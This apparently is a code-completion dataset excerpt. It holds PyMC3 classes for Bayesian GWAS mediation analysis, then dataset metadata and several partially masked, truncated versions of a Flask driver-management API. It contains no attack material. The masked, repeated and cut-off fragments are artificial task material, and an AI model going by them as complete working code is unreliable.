"""
raise NotImplementedError('This method has to be overwritten.')
def _create_shared_vars(self, **inputs):
"""
For each input variable, create theano shared variable
and set their initial values.
Args:
**inputs (dict): inputs for Bayesian model
Returns:
dict: key, value - var_name, theano.shared variable
"""
shared_vars = {}
for name, data in inputs.items():
shared_vars[name] = shared(data, name=name)
return shared_vars
def _clean_inputs(self, inputs):
"""
Clean the inputs, i.e. remove some
genotype columns. Useful for some class of Bayesian models
such as Two-Stage, where first stage involves filtering
on certain SNPs.
Args:
inputs (dict): inputs for Bayesian model
Returns:
dict: cleaned inputs for Bayesian model
"""
return inputs
def run(self, **inputs):
"""
Run cached Bayesian model using the inputs
Args:
**inputs (dict): inputs for Bayesian model
Returns:
trace: Trace of the PyMC3 inference
"""
if self.cached_model is None:
self.cache_model(**inputs)
for name, data in inputs.items():
self.shared_vars[name].set_value(data)
if self.mb and self.variational:
self.minibatches = zip(self._mb_generator(inputs['gwas_gen']),
self._mb_generator(inputs['gwas_phen']))
self.trace = self._inference()
return self.trace
def _inference(self, n_trace=None):
"""
Perform the inference. Uses ADVI if self.variational
is True. Also, uses minibatches is self.mb=True based
on generators defined in self.run.
Otherwise, uses Metropolis.
Args:
n_trace (int, optional): Number of steps used for trace
Returns:
trace: Trace of the PyMC3 inference
"""
if n_trace is None:
n_trace = self.n_trace
with self.cached_model:
if self.variational:
if self.mb:
v_params = pm.variational.advi_minibatch(n=self.n_chain,
minibatch_tensors=self.minibatch_tensors,
minibatch_RVs=self.minibatch_RVs,
minibatches=self.minibatches,)
else:
v_params = pm.variational.advi(n=self.n_chain)
trace = pm.variational.sample_vp(v_params, draws=n_trace)
self.v_params = v_params
else:
if self.steps is None:
self.steps = pm.Metropolis()
start = pm.find_MAP(fmin=optimize.fmin_powell)
trace = pm.sample(self.n_chain,
step=self.steps,
start=start,
progressbar=True,
)
trace = trace[-n_trace:]
self.trace = trace
return trace
def cross_validation(self, k_folds, **inputs):
"""
Run cross-validation on the inputs and calculate
statistics for each fold test set.
Args:
k_folds (sklearn.cross_validation): Folds of test and train
samples
**inputs (dict): inputs for Bayesian model
Returns:
dict: statistics for each fold
"""
self.cv_stats, self.cv_traces = [], []
self.k_folds = k_folds
inputs = self._clean_inputs(inputs)
for i, fold in enumerate(k_folds):
train, test = fold
input_train, input_test = {}, {}
for name, data in inputs.items():
if name in self.cv_vars:
input_train[name] = data[train]
input_test[name] = data[test]
else:
input_train[name] = data
input_test[name] = data
trace = self.run(**input_train)
stats = self.calculate_statistics(trace, **input_test)
self.cv_traces.append(trace)
self.cv_stats.append(stats)
return self.cv_traces, self.cv_stats
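# Hedged usage sketch (sklearn assumed; any iterable of (train_idx, test_idx)
# pairs works, since folds are only used to index the cv_vars):
#
#     from sklearn.model_selection import KFold
#     folds = KFold(n_splits=5).split(gwas_gen)
#     traces, stats = model.cross_validation(folds, gwas_gen=gwas_gen,
#                                            gwas_phen=gwas_phen)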
def calculate_ppc(self, trace):
"""
Calculate several post-predictive checks
based on the trace.
"""
dic = pm.stats.dic(trace, self.cached_model)
waic, log_py, logp = calculate_waic(trace, self.cached_model)
#loo = calculate_loo(log_py=log_py)
mu, sd, zscore = self._alpha_stats(trace)
return {'dic': dic,
'waic': waic,
'logp': logp,
#'loo': loo,
'mu': mu,
'sd': sd,
'zscore': zscore}
def calculate_statistics(self, trace, **input_test):
"""
Calculate mse and logp statistics on a test set.
Args:
**input_test (dict): test set of inputs
trace (PyMC3.trace): Trace of the inference chain
Returns:
dict: logp and mse
"""
inputs = self._clean_inputs(input_test)
mc_logp = self._logp(trace, **inputs)
mean_mse = self._mse(trace, **inputs)
mse2 = self._mse2(trace, **inputs)
mu, sd, zscore = self._alpha_stats(trace)
return {'logp': mc_logp,
'mse': mean_mse,
'mse2': mse2,
'mu': mu,
'sd': sd,
'zscore': zscore}
def calculate_bf(self, trace, var_name='mediator_model'):
'''
Calculate Bayes Factor using a Bernoulli variable in the
trace.
'''
p_alt = trace[var_name].mean()
bayes_factor = (p_alt/(1-p_alt))
return bayes_factor
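# Example (editor's note): with the p = [0.5, 0.5] indicator prior used in
# the BF models below, prior odds are 1, so posterior odds equal the Bayes
# factor; e.g. trace['mediator_model'].mean() == 0.8 gives 0.8/0.2 = 4.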
def _logp(self, trace, **inputs):
"""
Calculate log likelihood using Monte Carlo integration.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Log likelihood as estimated by Monte Carlo integration
"""
def calc_log(step):
exp_pred = np.dot(inputs['gwas_gen'],
step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_prob = norm.logpdf(x=inputs['gwas_phen'],
loc=phen_pred,
scale=step['phenotype_sigma'])
return phen_prob
phen_probs = [calc_log(trace[idx])
for idx in np.random.randint(0, len(trace), 500)]
phen_probs = np.asmatrix(phen_probs)
mc_logp = phen_probs.sum(axis=1).mean()
return mc_logp
def _mse(self, trace, **inputs):
"""
Calculate mean squared error of the model fit.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
phen_mse = []
for idx in np.random.randint(0, len(trace), 500):
step = trace[idx]
exp_pred = np.dot(inputs['gwas_gen'],
step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_mse.append(np.mean((inputs['gwas_phen'] - phen_pred) ** 2))
mean_mse = np.mean(phen_mse)
return mean_mse
def _mse2(self, trace, **inputs):
"""
Calculate mean squared error of the model fit
using posterior means of beta_med instead of
sampling from it.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
exp = np.dot(inputs['gwas_gen'],
trace['beta_med'].mean(axis=0).T)
phen_pred = exp * trace['alpha'].mean()
mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
return mse
def _alpha_stats(self, trace):
"""
Calculate statistics of the alpha value in
the trace.
"""
mean = np.mean(trace['alpha'])
sd = np.std(trace['alpha'], ddof=1)
zscore = mean / sd
return mean, sd, zscore
def _mb_generator(self, data, size=500):
"""
Generator for minibatches
"""
rng = np.random.RandomState(0)
while True:
ixs = rng.randint(len(data), size=size)
yield data[ixs]
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10,
*args, **kwargs):
"""
Args:
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean,
'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med',
mu=self.vars['coef_mean'],
sd=self.vars['coef_sd'],
shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
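# Hedged usage sketch (X, y are illustrative numpy arrays; coef_mean and
# coef_sd would come from the first-stage bootstrapped ElasticNet):
#
#     ts = TwoStage(coef_mean, coef_sd, variational=False, n_chain=50000)
#     trace = ts.run(gwas_gen=X, gwas_phen=y)
#     ppc = ts.calculate_ppc(trace)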
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10,
*args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean,
'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med',
mu=self.vars['coef_mean'],
sd=self.vars['coef_sd'],
shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
# Model Selection
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
# Model 1
phenotype_mu_null = intercept
# Model 2
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen',
lambda value: pm.switch(mediator_model,
pm.Normal.dist(mu=phenotype_mu_mediator, sd=phenotype_sigma).logp(value),
pm.Normal.dist(mu=phenotype_mu_null, sd=phenotype_sigma).logp(value)
),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
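# Editor's note: mediator_model is a binary indicator that switches the
# likelihood between the null (intercept-only) and mediated means, so after
# sampling, calculate_bf(trace) reads off the Bayes factor for mediation.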
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10,
p_sigma_beta=10, *args, **kwargs):
"""
Expression ~ N(X\beta, \sigma_exp)
P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\beta\alpha, \sigma_phen)
P(\alpha) ~ Uniform(-10, 10)
P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean,
'coef_sd': coef_sd,
'tau_beta': tau_beta,
'lambda_beta': lambda_beta,
'm_sigma_beta': m_sigma_beta,
'p_sigma_beta': p_sigma_beta
}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
# assert((coef_sd is not None) and (coef_mean is not None),
# 'Must provided coef_mean and coef_sd if using prior')
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen,
gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
# Expression
beta_med = pm.Normal('beta_med',
mu=self.vars['coef_mean'],
sd=self.vars['coef_sd'],
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'])
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma,
observed=med_phen)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
# alpha = pm.Uniform('alpha', -10, 10)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen,
gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
# Expression
tau_beta = pm.HalfCauchy('tau_beta',
beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta',
beta=self.vars['lambda_beta'],
shape=(1, n_snps))
# lambda_beta = pm.StudentT('lambda_beta', nu=3, mu=0,
# lam=1, shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta,
tau_beta * tau_beta)
beta_med = pm.Normal('beta_med',
mu=0,
tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'])
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma,
observed=med_phen)
# Phenotype
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen,
gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
# Expression
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps),)
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'])
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma,
observed=med_phen)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
# alpha = pm.Uniform('alpha', -10, 10)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
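# Hedged usage sketch: model_type picks the prior on beta_med ('laplace',
# 'horseshoe', or 'prior' with first-stage estimates); all three variants
# share the same mediator/phenotype likelihood structure:
#
#     joint = Joint(model_type='horseshoe', variational=True)
#     trace = joint.run(med_gen=..., med_phen=..., gwas_gen=..., gwas_phen=...)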
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self,
m_laplace_beta=1,
m_sigma_beta=10,
p_sigma_beta=10, *args, **kwargs):
"""
Expression ~ N(X\beta, \sigma_exp)
P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\beta\alpha, \sigma_phen)
P(\alpha) ~ Uniform(-10, 10)
P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(\beta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta,
'm_sigma_beta': m_sigma_beta,
'p_sigma_beta': p_sigma_beta
}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self,
med_gen, med_phen,
gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
# Expression
beta_med = pm.Laplace('beta_med',
mu=0,
b=self.vars['m_laplace_beta'],
shape=(1, n_snps),)
mediator_intercept = pm.Normal('mediator_intercept',
mu=0,
sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma',
lower=0,
upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma',
beta=self.vars['m_sigma_beta'],
shape=n_tissues)
mediator = pm.Normal('mediator',
mu=mediator_mu,
sd=mediator_sigma[self.med_idx],
observed=med_phen)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=n_studies)
# alpha = pm.Uniform('alpha', -10, 10)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen',
mu=phen_mu,
sd=phen_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
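# Hedged usage sketch: med_idx maps each expression sample to its tissue and
# gwas_idx maps each GWAS sample to its study; both must be set before the
# model is first built:
#
#     m = MultiStudyMultiTissue(variational=False)
#     m.set_idx(med_idx, gwas_idx)
#     trace = m.run(med_gen=..., med_phen=..., gwas_gen=..., gwas_phen=...)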
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self,
g_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta,
'p_sigma_beta': p_sigma_beta,
}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self,
gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta',
mu=0,
b=self.vars['g_laplace_beta'],
shape=(1, n_snps),)
# Phenotype
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
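# Editor's note: NonMediated is the matching null model; comparing its WAIC
# (via calculate_ppc) against a mediated model on the same gwas_gen/gwas_phen
# gives a mediation-free baseline for model selection.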
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self,
mediator_mu,
mediator_sd,
m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu,
'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta,
}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
# Phenotype
mediator = pm.Normal('mediator',
mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'],
shape=n_samples)
mediator_meas = pm.Normal('mediator_meas',
mu=mediator,
sd=gwas_error,
shape=n_samples,
observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
#alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen',
mu=phenotype_mu,
sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
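# Editor's note: gwas_error is the per-sample standard error of the measured
# mediator, so the latent 'mediator' node is shrunk toward its prior where
# the measurement is noisy, as in the Gelman post cited above.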
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self,
mediator_mu,
mediator_sd,
precomp_med=True,
heritability=0.1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu,
'mediator_sd': mediator_sd,
'heritability': heritability,
'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med,
}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
# Mediator
mediator = pm.Normal('mediator',
mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'],
shape=n_samples)
mediator_meas = pm.Normal('mediator_meas',
mu=mediator,
sd=gwas_error,
shape=n_samples,
observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma',
beta=self.vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = (p_var*h)/(1-h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained/(md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = (p_var*h)/(1-h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained/(md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
# Model Selection
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
# Model 1
phenotype_mu_null = intercept
# Model 2
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen',
lambda value: pm.switch(mediator_model,
pm.Normal.dist(mu=phenotype_mu_mediator, sd=phenotype_sigma).logp(value),
pm.Normal.dist(mu=phenotype_mu_null, sd=phenotype_sigma).logp(value)
),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model | [
28,
29,
46,
49,
55
] |
1,690 | ee7820d50b5020a787fbaf012480e8c70bc0ee41 | <mask token>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Invalid driver data.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
<mask token>
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<mask token>
| <mask token>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exists.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
<mask token>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Invalid driver data.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Success': 'Driver deleted with success!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<mask token>
| <mask token>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exists.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Invalid driver data.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Success': 'Driver deleted with success!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
| from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exists.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
